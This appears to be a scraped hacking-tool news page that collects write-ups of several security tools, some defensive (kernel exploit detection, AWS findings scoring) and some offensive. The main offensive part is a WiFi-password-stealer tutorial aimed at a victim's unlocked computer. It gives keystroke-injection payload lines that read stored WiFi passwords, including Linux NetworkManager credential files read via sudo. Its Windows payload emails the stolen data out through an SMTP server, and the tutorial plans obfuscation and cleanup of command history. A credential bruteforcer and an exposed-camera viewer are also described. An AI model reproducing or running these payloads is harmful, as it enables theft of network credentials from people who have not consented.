  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

For any inquiries or further information, you can reach me through the following channels:



RansomLord Anti-Ransomware Exploit Tool 2

RansomLord is a proof-of-concept tool that automates the creation of PE files, used to compromise ransomware pre-encryption. This tool uses dll hijacking to defeat ransomware by placing PE files in the x32 or x64 directories where the program is run from.

Stegano 0.11.3

Stegano is a basic Python Steganography module. Stegano implements two methods of hiding: using the red portion of a pixel to hide ASCII messages, and using the Least Significant Bit (LSB) technique. It is possible to use a more advanced LSB method based on integers sets. The sets (Sieve of Eratosthenes, Fermat, Carmichael numbers, etc.) are used to select the pixels used to hide the information.
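For example, hiding and revealing a message with the module's lsb interface looks roughly like this ("cover.png" stands in for any lossless cover image):

from stegano import lsb

secret = lsb.hide("cover.png", "attack at dawn")  # embed message in pixel LSBs
secret.save("cover_with_secret.png")
print(lsb.reveal("cover_with_secret.png"))        # -> "attack at dawn"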

WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R


Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.


Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

A keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like the Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses the STRING command to process keystrokes for injection. It accepts one or more alphanumeric/punctuation characters and types the remainder of the line exactly as-is into the target machine. ENTER/SPACE simulate presses of the corresponding keyboard keys.

Delays

We use the DELAY command to temporarily pause execution of the payload. This is useful when the payload needs to wait for an element such as a command line to load. A delay is especially useful at the very beginning, when a new USB device is connected to the targeted computer: the computer must complete a set of actions before it can begin accepting input commands. For HIDs the setup time is very short; in most cases it takes a fraction of a second, because the drivers are built in. However, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer or device. Once the data is collected, the adversary can package it to avoid detection while sending it over the network, using encryption or compression. The two most common ways of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, the payload will send the data to the appointed email address using Yahoo SMTP. For more detailed instructions, visit the following link. The payload template also needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script, you will need to update it with the correct name of your USB stick, after which you can type the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles and uses plugins for reading and writing them. The keyfile plugin uses an .ini-style format to store network configuration profiles, and it supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with a regex to extract the data of interest. For file filtering, a positive lookbehind assertion ((?<=keyword)) was used. The positive lookbehind matches at the position right after the keyword without making that text itself part of the match, so the regex (?<=keyword).* matches any text after the keyword. This allows the payload to match the values after the ssid and psk (pre-shared key) keywords.
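The same lookbehind idea, sketched with Python's re module against a toy keyfile (the payload itself does this with grep -oP):

import re

keyfile = """[wifi]
ssid=WLAN1

[wifi-security]
psk=pass1
"""

ssid = re.search(r"(?<=ssid=).*", keyfile).group()  # text right after "ssid="
psk = re.search(r"(?<=psk=).*", keyfile).group()    # text right after "psk="
print(ssid, psk)  # WLAN1 pass1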

For more information about NetworkManager, here are some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of the Rubber Ducky over the RPi Pico is that it doesn't show up as a USB mass storage device once plugged in: the machine sees it only as a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details, visit this link.

Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below is an example of how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


Pantheon - Insecure Camera Parser

By: Zion3R


Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

Functionalities

Pantheon allows users to execute an API crawler. There was originally functionality without the use of any APIs (like Insecam), but Google's TOS kept getting in the way of the original scraping mechanism.


Installation

  1. git clone https://github.com/josh0xA/Pantheon.git
  2. cd Pantheon
  3. pip3 install -r requirements.txt
    Execution: python3 pantheon.py
  • Note: I will later add a GUI installer to make it fully indepenent of a CLI

Windows

  • You can just follow the steps above or download the official package here.
  • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

Ubuntu

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/ubuntu_install.sh
  • ./distros/ubuntu_install.sh

Debian and Kali Linux

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/debian-kali_install.sh
  • ./distros/debian-kali_install.sh

MacOS

  • The regular installation steps above should suffice. If not, open up an issue.

Usage

(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

(Left-click) on a selected IP:Port to view the geolocation of the camera.
(Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

Adjust the map as you please to see the markers.

  • Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login).

Ethical Notice

The developer of this program, Josh Schiavone, is not responsible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected; that is illegal. Furthermore, if you do choose to use Pantheon to view a live feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

Licence

MIT License
Copyright (c) Josh Schiavone



Top 20 Most Popular Hacking Tools in 2023

By: Zion3R

As in previous years, we have put together a ranking of the most popular tools between January and December 2023.

The tools of this year encompass a diverse range of cybersecurity disciplines, including AI-Enhanced Penetration Testing, Advanced Vulnerability Management, Stealth Communication Techniques, Open-Source General Purpose Vulnerability Scanning, and more.

Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2023:


  1. PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


  2. Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


  3. Faraday - Open Source Vulnerability Management Platform


  4. CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare


  5. Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools


  6. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


  7. Waf-Bypass - Check Your WAF Before An Attacker Does


  8. PentestGPT - A GPT-empowered Penetration Testing Tool


  9. Sirius - First Truly Open-Source General Purpose Vulnerability Scanner


  10. LSMS - Linux Security And Monitoring Scripts


  11. GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM


  12. Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403


  13. ThunderCloud - Cloud Exploit Framework


  14. GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


  15. Kscan - Simple Asset Mapping Tool


  16. RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry


  17. DNSWatch - DNS Traffic Sniffer and Analyzer


  18. IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


  19. TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions


  20. XSS-Exploitation-Tool - An XSS Exploitation Tool





Happy New Year wishes the KitPloit team!


VED-eBPF - Kernel Exploit And Rootkit Detection Using eBPF

By: Zion3R


VED (Vault Exploit Defense)-eBPF leverages eBPF (extended Berkeley Packet Filter) to implement runtime kernel security monitoring and exploit detection for Linux systems.

Introduction

eBPF is an in-kernel virtual machine that allows code execution in the kernel without modifying the kernel source itself. eBPF programs can be attached to tracepoints, kprobes, and other kernel events to efficiently analyze execution and collect data.

VED-eBPF uses eBPF to trace security-sensitive kernel behaviors and detect anomalies that could indicate an exploit or rootkit. It provides two main detections:

  • wCFI (Control Flow Integrity) traces the kernel call stack to detect control flow hijacking attacks. It works by generating a bitmap of valid call sites and validating each return address matches a known callsite.

  • PSD (Privilege Escalation Detection) traces changes to credential structures in the kernel to detect unauthorized privilege escalations.


How it Works

VED-eBPF attaches eBPF programs to kernel functions to trace execution flows and extract security events. The eBPF programs submit these events via perf buffers to userspace for analysis.

wCFI

wCFI traces the call stack by attaching to functions specified on the command line. On each call, it dumps the stack, assigns a stack ID, and validates the return addresses against a precomputed bitmap of valid call sites generated from objdump and /proc/kallsyms.

If an invalid return address is detected, indicating a corrupted stack, it generates a wcfi_stack_event containing:

* Stack trace
* Stack ID
* Invalid return address

This security event is submitted via perf buffers to userspace.

The wCFI eBPF program also tracks changes to the stack pointer and kernel text region to keep validation up-to-date.
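Conceptually, the check reduces to set membership on return addresses. A userspace Python sketch of the idea (the real validation runs inside the eBPF program; callsites.txt is a hypothetical dump of call-site addresses precomputed from objdump and /proc/kallsyms):

# Build the set of valid call sites, one hex address per line.
valid_callsites = set()
with open("callsites.txt") as f:
    for line in f:
        valid_callsites.add(int(line, 16))

def check_stack(return_addresses):
    """Flag any return address that is not a known call site."""
    for addr in return_addresses:
        if addr not in valid_callsites:
            print(f"wcfi_stack_event: invalid return address {addr:#x}")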

PSD

PSD traces credential structure modifications by attaching to functions like commit_creds and prepare_kernel_cred. On each call, it extracts information like:

* Current process credentials
* Hashes of credentials and user namespace
* Call stack

It compares credentials before and after the call to detect unauthorized changes. If an illegal privilege escalation is detected, it generates a psd_event containing the credential fields and submits it via perf buffers.

Prerequisites

VED-eBPF requires:

  • Linux kernel v5.17+ (tested on v5.17)
  • eBPF support enabled
  • BCC toolkit

Current Status

VED-eBPF is currently a proof-of-concept demonstrating the potential for eBPF-based kernel exploit and rootkit detection. Ongoing work includes:

  • Expanding attack coverage
  • Performance optimization
  • Additional kernel versions
  • Integration with security analytics

Conclusion

VED-eBPF shows the promise of eBPF for building efficient, low-overhead kernel security monitoring without kernel modification. By leveraging eBPF tracing and perf buffers, critical security events can be extracted in real time and analyzed to identify emerging kernel threats in cloud-native environments.



Legba - A Multiprotocol Credentials Bruteforcer / Password Sprayer And Enumerator

By: Zion3R


Legba is a multiprotocol credentials bruteforcer / password sprayer and enumerator built with Rust and the Tokio asynchronous runtime in order to achieve better performance and stability while consuming fewer resources than similar tools (see the benchmark below).

For the building instructions, usage and the complete list of options check the project Wiki.


Supported Protocols/Features:

AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace), Cassandra/ScyllaDB, DNS subdomain enumeration, FTP, HTTP (basic authentication, NTLMv1, NTLMv2, multipart form, custom requests with CSRF support, files/folders enumeration, virtual host enumeration), IMAP, Kerberos pre-authentication and user enumeration, LDAP, MongoDB, MQTT, Microsoft SQL, MySQL, Oracle, PostgreSQL, POP3, RDP, Redis, SSH / SFTP, SMTP, STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ), TCP port scanning, Telnet, VNC.

Benchmark

Here's a benchmark of legba versus thc-hydra running some common plugins, both targeting the same test servers on localhost. The benchmark has been executed on a macOS laptop with an M1 Max CPU, using a wordlist of 1000 passwords with the correct one being on the last line. Legba was compiled in release mode, Hydra compiled and installed via brew formula.

Far from being an exhaustive benchmark (some legba features are simply not supported by hydra, such as CSRF token grabbing), this table still gives a clear idea of how using an asynchronous runtime can drastically improve performance.

Test Name                     Hydra Tasks   Hydra Time   Legba Tasks   Legba Time
HTTP basic auth               16            7.100s       10            1.560s (4.5x faster)
HTTP POST login (wordpress)   16            14.854s      10            5.045s (2.9x faster)
SSH                           16            7m29.85s *   10            8.150s (55.1x faster)
MySQL                         4 **          9.819s       4 **          2.542s (3.8x faster)
Microsoft SQL                 16            7.609s       10            4.789s (1.5x faster)

* This result suggests that Hydra applies a default delay between connection attempts. I've tried to find such a delay in the source code, but to my knowledge there is none; for some reason it is simply very slow.
** For MySQL, Hydra automatically reduces the number of tasks to 4, so legba's concurrency level has been adjusted to 4 as well.

License

Legba is released under the GPL 3 license. To see the licenses of the project dependencies, install cargo license with cargo install cargo-license and then run cargo license.



BestEdrOfTheMarket - Little AV/EDR Bypassing Lab For Training And Learning Purposes

By: Zion3R


Little AV/EDR Evasion Lab for training & learning purposes. (under construction)

 ____            _     _____ ____  ____     ___   __   _____ _
| __ )  ___  ___| |_  | ____|  _ \|  _ \   / _ \ / _| |_   _| |__   ___
|  _ \ / _ \/ __| __| |  _| | | | | |_) | | | | | |_    | | | '_ \ / _ \
| |_) |  __/\__ \ |_  | |___| |_| |  _ <  | |_| |  _|   | | | | | |  __/
|____/ \___||___/\__| |_____|____/|_| \_\  \___/|_|     |_| |_| |_|\___|
            __  __            _        _
           |  \/  | __ _ _ __| | _____| |_
           | |\/| |/ _` | '__| |/ / _ \ __|
           | |  | | (_| | |  |   <  __/ |_     Yazidou - github.com/Xacone
           |_|  |_|\__,_|_|  |_|\_\___|\__|


BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) project, designed to serve as a testing ground for understanding and bypassing the user-mode detection methods frequently used by security solutions. These techniques are mainly based on dynamic analysis of the target process state (memory, API calls, etc.).

Feel free to check this short article I wrote that describes the interception and analysis methods implemented by the EDR.


Defensive Techniques

In progress:


Usage

Usage: BestEdrOfTheMarket.exe [args]

  /help     Shows this help message and quit
  /v        Verbosity
  /iat      IAT hooking
  /stack    Threads call stack monitoring
  /nt       Inline Nt-level hooking
  /k32      Inline Kernel32/Kernelbase hooking
  /ssn      SSN crushing

BestEdrOfTheMarket.exe /stack /v /k32
BestEdrOfTheMarket.exe /stack /nt
BestEdrOfTheMarket.exe /iat


Blutter - Flutter Mobile Application Reverse Engineering Tool

By: Zion3R


Flutter Mobile Application Reverse Engineering Tool by Compiling Dart AOT Runtime

Currently the application supports only Android libapp.so (arm64 only), and it works only against recent Dart versions.

For high priority missing features, see TODO


Environment Setup

This application uses the C++20 formatting library. It requires a very recent C++ compiler such as g++ >= 13 or Clang >= 15.

I recommend using a Linux OS (only tested on Debian sid/trixie) because it is easy to set up.

Debian Unstable (gcc 13)

  • Install build tools and depenencies
apt install python3-pyelftools python3-requests git cmake ninja-build \
build-essential pkg-config libicu-dev libcapstone-dev

Windows

  • Install git and python 3
  • Install latest Visual Studio with "Desktop development with C++" and "C++ CMake tools"
  • Install required libraries (libcapstone and libicu4c)
python scripts\init_env_win.py
  • Start "x64 Native Tools Command Prompt"

macOS Ventura (clang 15)

  • Install XCode
  • Install clang 15 and required tools
brew install llvm@15 cmake ninja pkg-config icu4c capstone
pip3 install pyelftools requests

Usage

Extract "lib" directory from apk file

python3 blutter.py path/to/app/lib/arm64-v8a out_dir

blutter.py will automatically detect the Dart version from the Flutter engine and call the appropriate blutter executable to extract the information from libapp.so.

If the blutter executable for the required Dart version does not exist, the script will automatically check out the Dart source code and compile it.

Update

You can use git pull to update, then run blutter.py with the --rebuild option to force rebuilding the executable.

python3 blutter.py path/to/app/lib/arm64-v8a out_dir --rebuild

Output files

  • asm/* libapp assemblies with symbols
  • blutter_frida.js the frida script template for the target application
  • objs.txt complete (nested) dump of Object from Object Pool
  • pp.txt all Dart objects in Object Pool

Directories

  • bin contains blutter executables for each Dart version in "blutter_dartvm<ver>_<os>_<arch>" format
  • blutter contains source code. need building against Dart VM library
  • build contains building projects which can be deleted after finishing the build process
  • dartsdk contains checkout of Dart Runtime which can be deleted after finishing the build process
  • external contains 3rd party libraries for Windows only
  • packages contains the static libraries of Dart Runtime
  • scripts contains python scripts for getting/building Dart

Generating Visual Studio Solution for Development

I use Visual Studio to develop Blutter on Windows. The --vs-sln option can be used to generate a Visual Studio solution.

python blutter.py path\to\lib\arm64-v8a build\vs --vs-sln

TODO

  • More code analysis
    • Function arguments and return type
    • Some psuedo code for code pattern
  • Generate better Frida script
    • More internal classes
    • Object modification
  • Obfuscated app (still missing many functions)
  • Reading iOS binary
  • Input as apk or ipa


Metahub - An Automated Contextual Security Findings Enrichment And Impact Evaluation Tool For Vulnerability Management

By: Zion3R


MetaHub is an automated contextual security findings enrichment and impact evaluation tool for vulnerability management. You can use it with AWS Security Hub or any ASFF-compatible security scanner. Stop relying on useless severities and switch to impact scoring definitions based on YOUR context.


MetaHub is an open-source security tool for impact-contextual vulnerability management. It can automate the process of contextualizing security findings based on your environment and your needs (YOUR context), identifying ownership, and calculating an impact score that you can use for prioritization and automation. You can use it with AWS Security Hub or any ASFF security scanner (like Prowler).

MetaHub describes your context by connecting to the affected resources in the affected accounts. It can describe information about your AWS account and organization, the affected resources' tags, the related CloudTrail events, the affected resource configurations, and all their associations: if you are contextualizing a security finding affecting an EC2 instance, MetaHub will not only connect to the instance itself but also to its IAM roles; from there, it will connect to the IAM policies associated with those roles. It will connect to the security groups and analyze all their rules, the VPC and the subnets where the instance is running, the volumes, the Auto Scaling groups, and more.

After fetching all the information from your context, MetaHub evaluates certain important conditions for all your resources: exposure, access, encryption, status, environment and application. Based on those calculations, combined with the information from all the security findings affecting the resource, MetaHub generates a score for each finding.
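Purely as an illustration of folding such criteria into one number (none of these weights or rules come from MetaHub itself):

# Hypothetical per-resource criteria; True means the risk-increasing
# condition was observed for the affected resource.
criteria = {
    "exposure": True,       # reachable from the internet
    "access": True,         # broad IAM/network access
    "encryption": False,    # data at rest is encrypted, so no extra risk
    "status": True,         # resource is running/enabled
    "environment": True,    # production environment
}
weights = {"exposure": 0.3, "access": 0.25, "encryption": 0.2,
           "status": 0.1, "environment": 0.15}

impact = sum(weights[name] for name, hit in criteria.items() if hit)
print(f"impact score: {impact:.2f}")  # 0.80 on a 0-1 scale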

Check the following dashboard generated by MetaHub. You have the affected resources, grouping all the security findings affecting them together and the original severity of the finding. After that, you have the Impact Score and all the criteria MetaHub evaluated to generate that score. All this information is filterable, sortable, groupable, downloadable, and customizable.



You can rely on this Impact Score for prioritizing findings (where should you start?), directing attention to critical issues, and automating alerts and escalations.

MetaHub can also filter, deduplicate, group, report, suppress, or update your security findings in automated workflows. It is designed for use as a CLI tool or within automated workflows, such as AWS Security Hub custom actions or AWS Lambda functions.

The following is the JSON output for an EC2 instance; see how MetaHub organizes all the information about its context together under associations, config, tags, account, cloudtrail, and impact.



Context

In MetaHub, context refers to information about the affected resources like their configuration, associations, logs, tags, account, and more.

MetaHub doesn't stop at the affected resource but analyzes any associated or attached resources. For instance, if there is a security finding on an EC2 instance, MetaHub will not only analyze the instance but also the security groups attached to it, including their rules. MetaHub will examine the IAM roles that the affected resource is using and the policies attached to those roles for any issues. It will analyze the EBS attached to the instance and determine if they are encrypted. It will also analyze the Auto Scaling Groups that the instance is associated with and how. MetaHub will also analyze the VPC, Subnets, and other resources associated with the instance.

The Context module can retrieve information from the affected resources, the affected accounts, and every associated resource. It has four main parts: config (which also includes associations), tags, cloudtrail, and account. By default, config and tags are enabled, but you can change this behavior using the option --context (for enabling all the context modules, you can use --context config tags cloudtrail account). The output of each enabled key will be added under the affected resource.

Config

Under the config key, you can find anything related to the configuration of the affected resource. For example, if the affected resource is an EC2 instance, you will see keys like private_ip, public_ip, or instance_profile.
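Purely as an illustration, a config excerpt for an EC2 instance could look like this (the keys come from the example above; the values are made up):

"config": {
  "public_ip": "203.0.113.10",
  "private_ip": "10.0.1.25",
  "instance_profile": "my-instance-profile"
}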

You can filter your findings based on Config outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Associations

Under the associations key, you will find all the associated resources of the affected resource. For example, if the affected resource is an EC2 Instance, you will find resources like: Security Groups, IAM Roles, Volumes, VPC, Subnets, Auto Scaling Groups, etc. Each time MetaHub finds an association, it will connect to the associated resource again and fetch its own context.

Associations are key to understanding the context and impact of your security findings, such as their exposure.

You can filter your findings based on Associations outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Tags

MetaHub relies on AWS Resource Groups Tagging API to query the tags associated with your resources.

Note that not all AWS resource types support this API. You can check the supported services.

Tags are a crucial part of understanding your context. Tagging strategies often include:

  • Environment (like Production, Staging, Development, etc.)
  • Data classification (like Confidential, Restricted, etc.)
  • Owner (like a team, a squad, a business unit, etc.)
  • Compliance (like PCI, SOX, etc.)

If you follow a proper tagging strategy, you can filter and generate interesting outputs. For example, you could list all findings related to a specific team and provide that data directly to that team.

You can filter your findings based on Tags outputs using the option: --mh-filters-tags TAG=VALUE. See Tags Filtering

CloudTrail

Under the key cloudtrail, you will find critical CloudTrail events related to the affected resource, such as creation events.

The CloudTrail events that we look for are defined by resource type, and you can add, remove, or change them by editing the configuration file resources.py.

For example, for an affected resource of type Security Group, MetaHub will look for the following events:

  • CreateSecurityGroup: Security Group Creation event
  • AuthorizeSecurityGroupIngress: Security Group Rule Authorization event.
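The file resources.py is not reproduced in this excerpt; purely as an illustration, such a per-resource-type event mapping could look like the hypothetical Python sketch below (only the event names come from the list above; the real structure in lib/config/resources.py may differ):

# Hypothetical sketch; see lib/config/resources.py for the actual definitions.
CLOUDTRAIL_EVENTS = {
    "AwsEc2SecurityGroup": [
        "CreateSecurityGroup",            # Security Group creation event
        "AuthorizeSecurityGroupIngress",  # Security Group rule authorization event
    ],
}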

Account

Under the key account, you will find information about the account where the affected resource is running, such as whether it is part of an AWS Organization, its contact information, and more.

Ownership

MetaHub also focuses on ownership detection. It can determine the owner of the affected resource in various ways. This information can be used to automatically assign a security finding to the correct owner, escalate it, or make decisions based on this information.

An automated way to determine the owner of a resource is critical for security teams. It allows them to focus on the most critical issues and escalate them to the right people in automated workflows. But automating workflows this way is only viable if you have a reliable way to define the impact of a finding, which is why MetaHub also focuses on impact.

Impact

The impact module in MetaHub focuses on generating a score for each finding based on the context of the affected resource and all the security findings affecting it. For the context, we define a series of evaluated criteria; you can add, remove, or modify these criteria based on your needs. The impact criteria are combined with a metric generated from all the security findings affecting the affected resource and their severities.

The following are the impact criteria that MetaHub evaluates by default:

Exposure

Exposure evaluates how the affected resource is exposed to other networks. For example, whether the affected resource is public, whether it is part of a VPC, whether it has a public IP, and whether it is protected by a firewall or a security group.

Possible Statuses | Value | Description
effectively-public | 100% | The resource is effectively public from the Internet.
restricted-public | 40% | The resource is public, but there is a restriction, like a Security Group.
unrestricted-private | 30% | The resource is private but unrestricted, like an open security group.
launch-public | 10% | These are resources that can launch other resources as public, for example, an Auto Scaling Group or a Subnet.
restricted | 0% | The resource is restricted.
unknown | - | The resource couldn't be checked.

Access

Access evaluates the resource policy layer. MetaHub checks every available policy, including IAM managed policies, IAM inline policies, resource policies, bucket ACLs, and any association to other resources like IAM roles, whose policies are also analyzed. An unrestricted policy is not only an issue for that policy itself; it affects any other resource that uses it.

Possible Statuses | Value | Description
unrestricted | 100% | The principal is unrestricted, without any condition or restriction.
untrusted-principal | 70% | The principal is an AWS account that is not part of your trusted accounts.
unrestricted-principal | 40% | The principal is not restricted, defined with a wildcard. There could be conditions restricting it or other restrictions like S3 public access blocks.
cross-account-principal | 30% | The principal is from another AWS account.
unrestricted-actions | 30% | The actions are defined using wildcards.
dangerous-actions | 30% | Some dangerous actions are defined as part of this policy.
unrestricted-service | 10% | The policy allows an AWS service as principal without restriction.
restricted | 0% | The policy is restricted.
unknown | - | The policy couldn't be checked.

Encryption

Encryption evaluates the different encryption layers based on each resource type. For example, for some resources it evaluates whether both at_rest and in_transit encryption are enabled.

Possible Statuses | Value | Description
unencrypted | 100% | The resource is not fully encrypted.
encrypted | 0% | The resource is fully encrypted, including any of its associations.
unknown | - | The resource encryption couldn't be checked.

Status

Status evaluates the status of the affected resource in terms of attachment or functioning. For example, for an EC2 instance we evaluate whether the resource is running, stopped, or terminated, but for resources like EBS volumes and Security Groups, we evaluate whether those resources are attached to any other resource.

Possible Statuses | Value | Description
attached | 100% | The resource supports attachment and is attached.
running | 100% | The resource supports running and is running.
enabled | 100% | The resource supports enabled and is enabled.
not-attached | 0% | The resource supports attachment and is not attached.
not-running | 0% | The resource supports running and is not running.
not-enabled | 0% | The resource supports enabled and is not enabled.
unknown | - | The resource couldn't be checked for status.

Environment

Environment evaluates the environment where the affected resource is running. By default, MetaHub defines three environments: production, staging, and development, but you can add, remove, or modify these environments based on your needs. MetaHub evaluates the environment based on the tags of the affected resource, the account ID, or the account alias. You can define your own environment definitions and strategy in the configuration file (see Customizing Configuration).

Possible Statuses | Value | Description
production | 100% | It is a production resource.
staging | 30% | It is a staging resource.
development | 0% | It is a development resource.
unknown | - | The resource couldn't be checked for environment.

Application

